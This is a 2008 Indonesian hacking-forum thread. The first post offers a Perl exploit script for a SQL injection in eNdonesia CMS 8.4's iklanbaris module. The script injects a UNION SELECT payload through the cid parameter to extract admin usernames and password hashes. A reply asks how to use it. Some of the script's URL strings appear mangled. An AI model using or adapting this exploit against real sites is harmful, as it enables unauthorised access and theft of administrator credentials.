yadoy666 Script Learner
Jumlah posting : 121 Registration date : 20.09.07
| Subyek: eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi Thu Aug 28, 2008 8:16 pm | |
| - Code:
-
#!/usr/bin/perl #===================================================== #[x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit #[x] Vendor : http://www.endonesia.org/ #[x] Bug : mod.php?mod=iklanbaris&op=viewlink&cid #[x] Bugs Found at : 01-08-2008 #[x] Bugs Found By : YaDoY666 #[x] Author Blogs : http://yadoy666.blogspot.com/ #[x] Greets : Jack, n0c0py, odod, Jery Maheswara, x-sari, m4rtincornelis #===================================================== use HTTP::Request; use LWP::UserAgent;
$sql_vulnerable = "/mod.php?mod=iklanbaris&op=viewlink&cid="; $sql_injection ="-1/**/union+select/**/000,concat(aid,0x3a,pwd),666/**/from+authors/*where admin 1";
if(!@ARGV) { &help;exit(1);} sub help(){ print "\n [x] eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploit\n"; print " [x]===============================================\n"; print " [x] Use : perl $0 http://www.target.com/n"; print " [x] Dont use \"http:///"; print " [x] Exploit By : YaDoY666 http://yadoy666.blogspot.com/ \n"; print " [x]===============================================\n"; print " [x] YogyaFree - MainHack BrotherHood - Echo - Jasakom \n\n"; print " [x] http://www.yadoy666.blogspot.com/n/n"; }
while (){ my $target = $ARGV[0]; my $exploit = "http:///; print "\n [-] Trying to inject $target ...\n\n"; my $request = HTTP::Request->new(GET=>$exploit); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success){ my $res = $response->content; if ($res =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) { my ($username,$passwd) = ($1,$2); print " [target] $target \n"; print " [loginx] $username:$passwd \n\n"; exit(0); } else { die " [error] Fail to get username and password.\n\n"; } } else { die " [error] Fail to inject $target \n\n"; } }
#Blogz Nya YaDoY666 #http://yadoy666.blogspot.com
| |
|
Hardc0py Noobies
Jumlah posting : 13 Registration date : 19.11.08
| Subyek: Re: eNdonesia CMS 8.4 Mod Iklanbaris Remote SQL Injection Exploi Wed Nov 19, 2008 12:33 am | |
| wah bang yadoy gmn tuh cara gunain n mengerti tuh source code nya,,,
ajarin dunk,,,,
masih bingung bgt n ga ngerti,,
thx b'4 | |
|